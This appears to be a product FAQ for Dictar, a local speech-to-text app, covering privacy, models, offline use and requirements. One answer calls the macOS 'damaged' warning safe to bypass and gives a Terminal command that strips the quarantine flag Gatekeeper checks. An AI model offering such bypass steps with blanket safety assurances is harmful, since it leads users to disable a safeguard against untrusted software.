Is my audio sent to any server?
No. Dictar processes everything locally on your machine using downloaded AI models. No audio data ever leaves your device — not even anonymized or aggregated data. There are no servers involved.
What models does Dictar use?
Dictar supports two model families: Parakeet (by NVIDIA) for fast, streaming transcription in 25 languages, and Whisper (by OpenAI) for broad coverage across 99 languages. Models range from 75MB to 3GB depending on your accuracy and speed needs.
Does it work without an internet connection?
Yes. Once you download a model, Dictar works completely offline. The only time an internet connection is needed is during the initial model download.
How accurate is the transcription?
Dictar uses the same state-of-the-art models used by researchers and professionals worldwide. Accuracy depends on the model you choose — larger models are more accurate. You can also add custom vocabulary words for domain-specific terms.
Is Dictar really free?
Yes. Dictar is free and open source. There are no subscriptions, no usage limits, and no premium tiers. Your own hardware does all the processing — we just built the tool.
macOS says "Dictar is damaged" or can't be opened?
This is a standard macOS security warning for apps downloaded outside the App Store. It's safe to bypass. Open Terminal (search "Terminal" in Spotlight), paste this command: xattr -cr /Applications/Dictar.app, and press Enter. Then open Dictar normally. You only need to do this once.
What are the system requirements?
Dictar runs on macOS and Windows. It works best with a modern CPU — dedicated GPU is not required. The app itself is lightweight; model sizes range from 75MB (Whisper Tiny) to 3GB (Whisper Large v3).
